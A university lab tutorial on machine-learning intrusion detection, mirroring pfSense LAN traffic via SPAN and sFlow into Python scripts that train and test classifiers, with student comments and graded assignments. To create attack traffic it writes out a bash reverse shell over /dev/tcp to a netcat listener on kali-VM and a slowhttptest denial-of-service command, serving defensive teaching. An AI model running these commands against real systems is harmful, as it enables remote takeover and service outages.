Machine-learning-based intrusion detection

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

In this tutorial, we will get familiar with the machine-learning-based approach to intrusion detection. First, we establish a tunnel between the gateway and alice-VM and start mirroring the traffic on the LAN interface of the gateway into this tunnel. After that, we analyze this traffic with the help of machine learning models on alice-VM. To complete this tutorial, you need the virtual environment we configured in the previous tutorials of the course. The remainder of this tutorial is organized as follows. Several preliminary questions are presented in Section 2. Section 3 describes how to configure a tunnel between the gateway and alice-VM. Examples of using machine learning models for intrusion detection are provided in Section 4. Assignments are listed in Section 5. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 9.30 hours to complete.

2. Preliminary questions

What is the difference between machine learning, artificial intelligence and deep learning?
What is the difference between supervised and unsupervised machine learning?
What is a bridge? What is a SPAN port? What is OVS?
What is sFlow? What is the difference between sFlow and NetFlow?
Read the article "Detecting Reverse Shell with Machine Learning" and briefly explain the detection approach used by the authors.
Briefly explain what detection accuracy, precision, true positive rate, and false positive rate are. What other metrics can be used to evaluate machine learning models?

3. Mirroring traffic to SPAN port

In this section, we establish a tunnel between the gateway and alice-VM, which will be used to mirror the traffic sent and received on the LAN interface of the gateway.

If your gateway and/or alice-VM are currently running, shut them down.

In VirtualBox Manager, select alice-VM and open Settings. Go to Network -> Adapter 2. In "Attached to", select "Internal Network" and name the new network "opt3" (or "opt3_Anonymous", if you are working on one of the course's servers). Next, open "Advanced" settings and, in "Promiscuous Mode", select "Allow All". Click "Ok" to save the settings.

Tip: increase the CPU and RAM values for your alice-VM, especially if you work on the tieskybs servers. This can be done in "Settings -> System -> Processor" and "Settings -> System -> Motherboard" respectively.

— 11 Oct 23 (edited 11 Oct 23)

We now need to add one more network adapter to the gateway-VM. Unfortunately, the VirtualBox GUI does not allow adding more than 4 network adapters, so we have to use the console. The commands in a Linux terminal look as follows (again, remember that if you are using one of the course's servers, you need to substitute the network name "opt3" in the commands below with "opt3_Anonymous"):
```
$ vboxmanage modifyvm gateway --nic5 intnet
```
```
$ vboxmanage modifyvm gateway --intnet5 opt3
```
The same can be done in Windows command prompt as follows:
```
> "C:\Program Files\Oracle\VirtualBox\VBoxManage" modifyvm gateway --nic5 intnet
```
```
> "C:\Program Files\Oracle\VirtualBox\VBoxManage" modifyvm gateway --intnet5 opt3
```

Once editing has been completed, restart VirtualBox manager just in case, then start the following VMs: gateway, dnsserv, alice-VM, bob-VM and kali-VM.

In pfSense web configurator, go to Interfaces -> Assignments, find network port "em4" in "Available network ports" and click "+ Add". Next, go to Interfaces -> OPT3, click "Enable", scroll down, click "Save", then "Apply Changes".

After that, go to Interfaces -> Assignments (OPT3 should be there now) and select Bridges. Click "+ Add" and in "Member Interfaces" select "LAN". Click "Display Advanced", in "SPAN Port" select "OPT3", scroll to the bottom and click "Save". In "Interface assignments", find the bridge in "Available network ports" and click "Add".

Next, go to Interfaces -> OPT4, tick the "Enable interface" box, click "Save", then "Apply Changes". This enables the bridge we just created. It uses the OPT3 interface as a SPAN port to which LAN traffic is mirrored.

In alice-VM terminal execute the following command to install OVS:
```
$ sudo apt install openvswitch-switch
```

Add a new bridge in OVS:
```
$ sudo ovs-vsctl add-br br
```
and add the second network interface we added earlier on alice-VM to this bridge:
```
$ sudo ovs-vsctl add-port br enp0s8
```
Set interface "enp0s8" link up:
```
$ sudo ip link set enp0s8 up
```
Keep in mind that the result of the last "ip link" command above is not persistent. If you reboot your VM somewhere in the middle of the tutorial, you have to run this command again; otherwise enp0s8 will remain down and you will not be able to capture the traffic.

Stumbled into this issue later. If the interface is not up, running the script to capture traffic will cause 100% CPU use and the terminal will crash.

— 19 Sep 23

If you have done everything correctly by this point, you can now capture packets transferred via the LAN interface of the gateway on alice-VM's interface "enp0s8". Let's test that this is working as expected. In alice-VM, start capturing packets with tcpdump as follows:
```
$ sudo tcpdump -i enp0s8 host 192.168.10.102
```
where "192.168.10.102" is bob-VM's IP address (which can actually be different in your case).

In bob-VM's browser, go to any website, e.g. https://192.168.11.2/accounts (webserv-VM has to be up for this page to load). In case of success, you should see lots of traffic printed in the terminal on alice-VM, with either the source or the destination of each packet equal to bob-VM's IP, i.e. 192.168.10.102. Please make sure this part works as expected before moving to the next section. Then stop capturing by pressing Ctrl+C.

webserv-VM does not need to be up to see packets flow. But of course the page won't load :)

— 18 Sep 23

Not sure if this was an isolated issue, but I could not detect any traffic with the sFlow collector if I didn't have webserv-VM up and running. tcpdump worked fine and everything else ran smoothly.

— 11 Oct 23

Webserv should be up if you want to generate some meaningful traffic between bob and webserv; otherwise there will only be some SYN packets every now and then. If you go to another website from bob, then obviously there will be lots of traffic and you do not need the webserv to be running for that :)

— 11 Oct 23 (edited 11 Oct 23)

Tip: if you do not see any traffic when running this tcpdump command, check post 41 in the chat, and double-check everything that is mentioned there: interface names, bob's IP, "Allow All", etc.

— 11 Oct 23

4. Detecting malicious flows with machine learning

As a rule, machine learning (ML) includes two stages: training and inference. During the former, a machine learning model is trained using the data examples available. This model is essentially a function with thousands (or even millions) of trainable parameters, which accepts some data (features) as the input and returns some data (labels) as the output.

Thus, training an ML model can be defined as follows: given examples of input data and the corresponding output labels, adjust the model parameters (weights) so that the model's outputs match those labels as closely as possible. ML inference is the opposite: given the trained model and examples of new input data, predict the corresponding output labels. In our example, the input data is the traffic on the gateway's LAN interface which we capture on alice-VM, and the output label is the type of the traffic: legitimate or malicious.
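To make the two stages concrete, here is a minimal sketch in plain Python. It is not the model used by the course scripts: it is a tiny logistic regression, and the two features and all numbers in the toy dataset are made up for illustration.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def predict_proba(weights, bias, features):
    """Inference: map a feature vector to the probability of the 'malicious' label."""
    z = bias + sum(w * x for w, x in zip(weights, features))
    return sigmoid(z)

def train(samples, labels, learning_rate=0.5, epochs=500):
    """Training: adjust weights and bias so that predictions move towards the known labels."""
    weights = [0.0] * len(samples[0])
    bias = 0.0
    for _ in range(epochs):
        for features, label in zip(samples, labels):
            error = predict_proba(weights, bias, features) - label
            weights = [w - learning_rate * error * x for w, x in zip(weights, features)]
            bias -= learning_rate * error
    return weights, bias

# Toy, made-up data: two hypothetical features per connection, scaled to 0..1.
train_x = [[0.1, 0.2], [0.2, 0.1], [0.9, 0.8], [0.8, 0.9]]
train_y = [1, 1, 0, 0]  # 1 = malicious, 0 = normal

weights, bias = train(train_x, train_y)

# Inference on inputs that were not part of the training data.
print(predict_proba(weights, bias, [0.15, 0.15]))  # resembles the malicious examples
print(predict_proba(weights, bias, [0.85, 0.85]))  # resembles the normal examples
```

The neural networks used later in the tutorial follow the same pattern, only with many more parameters and a more elaborate update rule.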

In order to apply the approach described, we first need to collect some data examples for training. In this tutorial, we will use sFlow to extract data from the switch and send it for further processing. To add an sFlow agent on alice-VM's OVS, run:
```
$ sudo ovs-vsctl -- --id=@sflow create sflow target="\"localhost:6343\"" sampling=1 polling=1 -- set bridge br sflow=@sflow
```
Explanation for sampling and polling parameters can be found here.

"Page not found" on Wed Sep 27 2023 13:53. It's archived on wayback machine though; https://web.archive.org/web/20220704152052/https://www.plixer.com/blog/what-is-sflow-how-do-i-understand-it/ (checked Wed Sep 27 2023)

— 27 Sep 23

thanks, I subbed the link with another one; basically you can just google "sflow sampling vs polling" and read the first link if interested; not really important for the assignment though

— 29 Sep 23 (edited 29 Sep 23)

Download the package with Python scripts we will use for ML training and inference:
```
$ wget http://@/files/ml_ids.zip
```
and extract the content:
```
$ unzip ml_ids.zip
```

Install python3-pip on alice-VM:
```
$ sudo apt install python3-pip
```
and then install Python packages needed to run the scripts:
```
$ pip3 install numpy pandas torch
```

If you're on a slow internet (e.g. faculty servers), installing torch will take a looong time as it downloads several gigabytes of dependencies and itself.

— 10 Oct 23

I do not think the internet is slow on faculty servers; it is rather networking in VMs which is extremely slow there...

Edit: you can switch the 1st alice's network adapter to NAT, run this "pip install" command, then switch back to internal "lan_username". You should not even need to restart the VM when switching network adapter.

The problem is internal networking through pfsense works 20 times slower than default NAT on tieskybs servers, I dunno why, on my local pc, the data rate is more or less the same...

— 11 Oct 23 (edited 11 Oct 23)

Change directory to "ml_ids":
```
$ cd ml_ids
```
Further in the tutorial, it is assumed that we are in this directory.

First, to parse sFlow samples, run the collector:
```
$ python3 sflow_collector.py
```
To test that it is working as expected, generate some HTTP or HTTPS traffic on bob-VM, e.g. by opening a website in the browser. In case of success, you should observe data printed in the terminal on alice-VM. Each sample in the data includes the timestamp, source IP address, source port, destination IP address, destination port and size of the packet.

If there is no output, please check again that you actually see Bob's traffic when running:
```
$ sudo tcpdump -i enp0s8 host 192.168.10.102
```
One more odd thing that may happen (it happened to me when testing in Ubuntu 22.04) is that the terminal misbehaves: the output is not shown until you press some key, or the terminal freezes and shows the result in chunks. In this case, just close the terminal and open a new one.

In the case of success, stop the collector by pressing Ctrl+C.

Had to run the collector multiple times in different terminals before it started capturing. So if everything seems correct just try again (and again.)

— 05 Oct 23

For the sake of demonstration, in this tutorial, we will pipe several python scripts together directly in our terminal, so that we can observe the result of each step of the data processing pipeline. This is obviously not how you would do it in a real life use case :) Let's connect output of the sFlow collector to the next script to extract features needed for the data analysis:
```
$ python3 sflow_collector.py | python3 extract_features.py
```
If IP addresses in your virtual network environment are not the same as the ones used in the tutorials, the scripts may not work. To make them work, open file "config.py" in the same directory "ml_ids", find parameters "subnet" and "attacker_ip" and edit them so that they correspond to IP addresses in your network.

Again, generate some HTTP or HTTPS traffic on bob-VM and observe the result in alice-VM's terminal. The last script in the command above first combines packets with the same IP addresses and ports, extracted from sFlow samples, into connections. Connection information is contained in the first four items of each comma-separated line printed. The remaining elements in each line correspond to features extracted from that connection. In this tutorial, we use some of the CIC-IDS features from Table 3. Press Ctrl+C to stop the extraction process.
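The idea of combining packet samples into connections and computing per-connection features can be sketched as follows. This is only an illustration, not the code of "extract_features.py": the tuple layout of a sample, the helper names and the four statistics are assumptions, and the actual script computes CIC-IDS-style features.

```python
from collections import defaultdict

# Hypothetical sample layout: (timestamp, src_ip, src_port, dst_ip, dst_port, size)
samples = [
    (0.00, "192.168.10.102", 51000, "192.168.11.2", 443, 74),
    (0.05, "192.168.11.2", 443, "192.168.10.102", 51000, 1500),
    (0.30, "192.168.10.102", 51000, "192.168.11.2", 443, 66),
    (0.10, "192.168.10.102", 51002, "192.168.12.2", 443, 120),
]

def connection_key(src_ip, src_port, dst_ip, dst_port):
    """Return the same key for both directions of a connection."""
    a, b = (src_ip, src_port), (dst_ip, dst_port)
    return (a, b) if a <= b else (b, a)

def extract_features(samples):
    """Group packets by connection and compute a few per-connection statistics."""
    connections = defaultdict(list)
    for ts, src_ip, src_port, dst_ip, dst_port, size in samples:
        key = connection_key(src_ip, src_port, dst_ip, dst_port)
        connections[key].append((ts, size))
    features = {}
    for key, packets in connections.items():
        times = [ts for ts, _ in packets]
        sizes = [size for _, size in packets]
        features[key] = {
            "packets": len(packets),
            "bytes": sum(sizes),
            "mean_size": sum(sizes) / len(sizes),
            "duration": max(times) - min(times),
        }
    return features

for key, stats in extract_features(samples).items():
    print(key, stats)
```

Both directions of a connection share one key here, so requests and responses contribute to the same feature vector.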

If IP addresses in your environment are not the same as used in the tutorials, the scripts may not work. To make them work, open file "config.py" in the same directory "ml_ids", find parameters "subnet" and "attacker_ip" and edit them according to IPs in your network.

Edit: for 99% of students it should work as it is, i.e. you do not need to edit anything; this is only for students who, for example, changed subnet IPs on the gateway in the beginning of the course because of some issues.

— 07 Oct 23 (edited 07 Oct 23)

Next we need to label the feature vectors extracted. Since we are going to generate malicious traffic only from kali-VM, we can label all the corresponding traffic as malicious simply by looking at IP addresses of the communicating hosts. The rest of the traffic can be labeled as normal:
```
$ python3 sflow_collector.py | python3 extract_features.py | python3 create_dataset.py
```
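The labeling rule described above fits in a few lines. The sketch below is an assumption about how such a rule could look, not the contents of "create_dataset.py"; the function name is hypothetical, and the attacker address is the kali-VM address used in this tutorial.

```python
def label_connection(src_ip, dst_ip, attacker_ip):
    """Return 1 (malicious) if the attacker is one of the endpoints, otherwise 0 (normal)."""
    return 1 if attacker_ip in (src_ip, dst_ip) else 0

# kali-VM address from this tutorial; adjust it if your network differs.
ATTACKER_IP = "192.168.12.2"

print(label_connection("192.168.10.102", "192.168.12.2", ATTACKER_IP))  # bob <-> kali
print(label_connection("192.168.10.102", "192.168.11.2", ATTACKER_IP))  # bob <-> webserv
```

This kind of labeling works only because the lab setup guarantees that all traffic to or from kali-VM is malicious; in a real network, labels are much harder to obtain.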

To test that it is working as expected, start a reverse shell connection between bob-VM and kali-VM. For this purpose, in the terminal of kali-VM, run:
```
$ nc -lvnp 443 -s 192.168.12.2
```
and in bob-VM's terminal:
```
$ /bin/bash -l > /dev/tcp/192.168.12.2/443 0<&1 2>&1
```
Execute some commands in the reverse shell obtained on kali-VM, e.g. "ls", "pwd", "whoami", "uname -a", "cd ", "cat ", etc. While doing this, check the last number of each line in the output printed in the terminal on alice-VM. In case of success, there should be samples with "1" at the end. There can also be samples with "0" at the end, which correspond to normal traffic generated by bob-VM's background processes; that is ok. Press Ctrl+C in kali-VM's terminal to stop the reverse shell.

Now we can generate a dataset to train an ML model. For this purpose, in the terminal of alice-VM, first, start capturing data samples (the command below is one line):
```
$ python3 sflow_collector.py | python3 extract_features.py | python3 create_dataset.py > shell_train.csv
```
After that, generate some malicious data as explained in the previous step, i.e. start netcat listener using port 443 on kali-VM, after that, from bob-VM, connect to this listener using the bash command to establish a reverse shell, then execute some Linux commands in the reverse shell. Generate malicious traffic for 2-3 minutes. During the process, you can also occasionally quit the shell by typing "exit" or simply pressing Ctrl+C, and then establish a new one.

In order to generate legitimate traffic, open the web browser on bob-VM, and browse several sites, e.g. make some random Google search requests or open YouTube and click several videos. Spend 1-2 minutes to generate some normal web traffic.

When you feel like you have had enough, return to the terminal on alice-VM and stop the traffic capturing.

Check the first few lines of file "shell_train.csv":
```
$ head shell_train.csv
```
There should be feature vectors that end with "1", i.e. malicious flows.

You can count the number of lines in that file using the wc tool:
```
$ wc -l shell_train.csv
```
Alternatively, you can use "check_dataset.py" script in the "ml_ids" directory:
```
$ python3 check_dataset.py -d shell_train.csv 
```
There should be at least 100 attack samples, and the more the better. If needed, you can capture more traffic and append it to the same file by substituting ">" with ">>" in the command from the previous step.
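If you want to count normal and attack samples yourself, a sketch like the one below does it. It assumes only what the tutorial states, namely that each line is comma-separated and ends with the label; the example lines are made up, and this is not the code of "check_dataset.py".

```python
from collections import Counter

def count_labels(lines):
    """Count how many feature vectors end with each label (the last comma-separated item)."""
    counts = Counter()
    for line in lines:
        line = line.strip()
        if line:
            counts[int(float(line.split(",")[-1]))] += 1
    return counts

# Made-up lines in the assumed layout: connection info, features, label.
example = [
    "192.168.10.102,51000,192.168.12.2,443,12,0.4,1",
    "192.168.10.102,51002,192.168.11.2,443,30,1.2,0",
    "192.168.10.102,51004,192.168.12.2,443,8,0.1,1",
]
counts = count_labels(example)
print("normal:", counts[0], "malicious:", counts[1])

# With a real file:
# with open("shell_train.csv") as f:
#     print(count_labels(f))
```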

If you have done everything right by this point, you can now train a supervised machine learning model to distinguish reverse shell connections from normal web traffic:
```
$ python3 train_supervised.py -d shell_train.csv
```

Once the model has been trained, test it using CSV file "shell_test.csv" located in the same directory:
```
$ python3 test_supervised.py -d shell_test.csv
```
This file contains 128 samples in total: 64 normal and 64 malicious ones. Check the evaluation metric values. Does the model classify the flows accurately?
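For reference, the usual evaluation metrics can be computed from true and predicted labels as sketched below. The label lists are made up, and the function is an illustration rather than the code of "test_supervised.py".

```python
def evaluate(y_true, y_pred):
    """Compute accuracy, precision, true positive rate and false positive rate."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(1 for t, p in pairs if t == 1 and p == 1)  # attacks detected
    tn = sum(1 for t, p in pairs if t == 0 and p == 0)  # normal flows passed
    fp = sum(1 for t, p in pairs if t == 0 and p == 1)  # false alarms
    fn = sum(1 for t, p in pairs if t == 1 and p == 0)  # attacks missed

    def ratio(numerator, denominator):
        return numerator / denominator if denominator else 0.0

    return {
        "accuracy": ratio(tp + tn, len(pairs)),
        "precision": ratio(tp, tp + fp),
        "tpr": ratio(tp, tp + fn),
        "fpr": ratio(fp, fp + tn),
    }

# Made-up example: 4 malicious and 4 normal flows, one mistake of each kind.
y_true = [1, 1, 1, 1, 0, 0, 0, 0]
y_pred = [1, 1, 1, 0, 0, 0, 0, 1]
print(evaluate(y_true, y_pred))
```

On a balanced test set such as this one, accuracy is a reasonable summary; on imbalanced data, the true and false positive rates are usually more informative.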

Finally, you can test the resulting model for online detection, by first executing on alice-VM:
```
$ python3 sflow_collector.py | python3 extract_features.py | python3 ids_supervised.py
```
Next, establish a reverse shell between bob-VM and the attacker. On alice-VM, check probability values returned by the model for the corresponding connection.

5. Assignment

5.1 Preliminary

Complete the test based on the preliminary questions (1 point).

# mlid_basic11

# mlid_basic12

# mlid_basic13

5.2 Basic

In file "config.py", find ML parameters (last section):

layers
validation_split
dropout
learning_rate
batch_size
epochs
patience

Artificial neural networks have two main hyperparameters that control the architecture (or topology) of the network: the number of hidden layers and the number of neurons in each hidden layer. In file config.py, we use list of integers "layers" to represent these two hyperparameters: each integer in the list corresponds to the number of the neurons in the corresponding layer.
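The effect of the "layers" list on the network size can be illustrated with a short sketch. It assumes a plain fully connected network with a bias in every layer and a single output neuron; the number of input features (10) and the example list [64, 32] are arbitrary values chosen for illustration, not the defaults from "config.py".

```python
def layer_shapes(n_features, layers, n_outputs=1):
    """Return (inputs, outputs) for every fully connected layer, hidden and output."""
    sizes = [n_features] + list(layers) + [n_outputs]
    return list(zip(sizes[:-1], sizes[1:]))

def count_parameters(n_features, layers, n_outputs=1):
    """Weights plus biases of all layers."""
    return sum(n_in * n_out + n_out
               for n_in, n_out in layer_shapes(n_features, layers, n_outputs))

layers = [64, 32]  # two hidden layers with 64 and 32 neurons
print(layer_shapes(10, layers))      # [(10, 64), (64, 32), (32, 1)]
print(count_parameters(10, layers))  # 2817
```

Adding layers or neurons increases the number of trainable parameters, which makes the model more flexible but also easier to overfit on a small dataset.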

Find information about other parameters present in the configuration file and complete the test below.

# mlid_basic3

Test the scripts used for reverse shell connection detection with several different values of the aforementioned parameters found in "config.py": layers, validation split, etc. For this purpose, use commands from steps 11 - 12.

The order of your actions should be the following:

Change parameter values in "config.py".

Train a new model:

$ python3 train_supervised.py -d shell_train.csv

Test the model trained using the test file provided:
```
$ python3 test_supervised.py -d shell_test.csv
```
Check the metric values. If not satisfied, go back to the first step.
If you think that your model is now quite accurate, run the test script against the assignment data file:
```
$ python3 test_supervised.py -d shell_assignment.csv -o shell_predictions.txt
```
Upload the file with predictions, i.e. "shell_predictions.txt", to the answer box below.

The number of points is calculated as (np.clip(accuracy - 0.5, 0, 0.5)) * 2, which means that if the accuracy is 50% (random chance) or below, no points are given.
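The scoring formula can be reproduced without NumPy as shown below. The accuracy values are arbitrary examples; 1016 correct predictions out of 1024 is used only to show how a few mistakes translate into points.

```python
def clip(value, low, high):
    """Plain-Python equivalent of np.clip for a single number."""
    return max(low, min(high, value))

def points(accuracy):
    """Map accuracy in [0, 1] to assignment points in [0, 1]."""
    return clip(accuracy - 0.5, 0.0, 0.5) * 2

print(points(0.45))         # 0.0
print(points(0.75))         # 0.5
print(points(1016 / 1024))  # 0.984375
print(points(1.0))          # 1.0
```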

Tip: if no matter what parameter values you use, the accuracy does not increase, your training dataset might be poor. In this case, you can try to generate more training samples and append them to the dataset as explained in the tutorial.

The file with answers should contain 1024 labels (0.0 or 1.0) separated by commas. Running "wc -c" against the file with predictions should output 4096 (4 bytes per label). Double-check this before uploading!
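A quick way to sanity-check the file before uploading is sketched below. It assumes that labels are written exactly as "0.0" or "1.0", joined by commas and followed by a single newline, which gives 3 bytes per label, 1023 commas and 1 newline, i.e. 4096 bytes; the function name is hypothetical.

```python
def check_predictions(text, expected_count=1024):
    """Return True if text holds exactly expected_count labels, each '0.0' or '1.0'."""
    labels = [item for item in text.strip().strip(",").split(",") if item]
    valid = all(label in ("0.0", "1.0") for label in labels)
    return valid and len(labels) == expected_count

# Made-up content in the assumed format.
example = ",".join(["0.0", "1.0"] * 512) + "\n"
print(len(example.encode()))       # 4096
print(check_predictions(example))  # True

# With a real file:
# with open("shell_predictions.txt") as f:
#     print(check_predictions(f.read()))
```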

Reverse shell detection (1 point):

I have 100% accuracy with my model but TIM awards 0.984375 points. Is there a bug?

— 18 Sep 23

no, why? 0.984 is a good result; you can try to generate more samples for your training dataset if you want to improve the score

Just to clarify, the full test dataset contains 1024 + 128 samples, 128 of which are in the shell_test.csv with labels and another 1024 - in shell_assignment.csv without labels obviously; the split was random, the accuracy values should not differ much.

— 19 Sep 23 (edited 25 Sep 23)

# mlid_basic4

How to get full 1 point in the assignment? I got 100% Accuracy with 100% true positive rate and 0.0% False positive rate and still no full 1 point. I thought that's perfect score or have I missed something?

— 11 Oct 23

you kidding, right? :)

— 11 Oct 23

Read about such deep learning models as autoencoder and deep support vector data description and complete the test below.

# mlid_basic5

You can try our implementation of the deep SVDD model using the scripts "train_unsupervised.py" and "test_unsupervised.py", which train and test the model respectively. They can be found in the same directory as the other scripts used in the tutorial and are used in exactly the same way as their supervised counterparts.
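The decision rule behind deep SVDD is a distance to a center: samples that land far from the center of the normal data are flagged as anomalies. The sketch below shows only this scoring step and deliberately leaves out the neural network that deep SVDD trains to map inputs into the space where the distance is measured. It is a simplification for illustration, not the course implementation, and the data and the 0.95 quantile are made up.

```python
def center(points):
    """Mean of the normal training points, used as the center."""
    dims = len(points[0])
    return [sum(p[i] for p in points) / len(points) for i in range(dims)]

def score(point, c):
    """Anomaly score: squared Euclidean distance to the center."""
    return sum((x - ci) ** 2 for x, ci in zip(point, c))

def fit(normal_points, quantile=0.95):
    """Return the center and a threshold taken from the scores of normal points."""
    c = center(normal_points)
    scores = sorted(score(p, c) for p in normal_points)
    index = min(len(scores) - 1, int(quantile * len(scores)))
    return c, scores[index]

def is_anomaly(point, c, threshold):
    return score(point, c) > threshold

# Made-up feature vectors of normal connections only: no attack samples are needed.
normal = [[0.9, 1.0], [1.0, 1.1], [1.1, 0.9], [1.0, 1.0]]
c, threshold = fit(normal)

print(is_anomaly([1.0, 1.05], c, threshold))  # close to the normal data
print(is_anomaly([5.0, 0.1], c, threshold))   # far from the normal data
```

Because only normal samples are needed for training, this family of models can detect attack types that were never seen during training.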

5.3 Advanced

Generate a new dataset as it was described in the tutorial, but only using normal traffic from bob-VM to the Internet. Generate at least 2000 normal samples, the number of attack ones should remain zero.

After that, start the webserv-VM. In pfSense web configurator, go to Interfaces -> Assignments -> Bridges. In member interfaces of our bridge BRIDGE0, select OPT1 and save changes. Use the scripts given in the tutorial to extract and collect features from malicious traffic flows generated with the help of SlowHttpTest from kali-VM:

$ slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://192.168.11.2/accounts/index.php -x 24 -p 3

You can either append new samples to the file with normal data generated a few moments ago, or save them in a new file. In the latter case, you should pass both files to the Python scripts which require the "-d" argument, e.g.:

$ python3 check_dataset.py -d file1.csv file2.csv

In your case, csv file names can obviously be different.

The assignment is the same as the basic one:

Train a model (supervised or unsupervised) using the dataset you created. As before, test multiple parameter combinations to find the best one.
Evaluate the resulting models using file "slowhttp_test.csv".
Once the accuracy is high enough, test your model against the assignment file "slowhttp_assignment.csv" to generate predictions.
Upload the file with your predictions in the answer box below.

The number of predictions should be 4096; running "wc -c <file_with_predictions>" should return 4 times that.

SlowHTTP DoS detection (2 points):

# mlid_advanced

5.4 General comments and feedback

Let us know how many hours in total you have spent on this assignment:

# mlid_time

On a scale from 1 to 10, estimate how interesting and how difficult the tutorial was:

# mlid_interest

# mlid_difficulty

You can also give us some general feedback:

# mlid_feedback

6. Conclusion

In this tutorial, we got familiar with bridging, SPAN, OVS and sFlow. After that, we employed the machine-learning-based approach for intrusion detection.

More information on the topic can be found at:
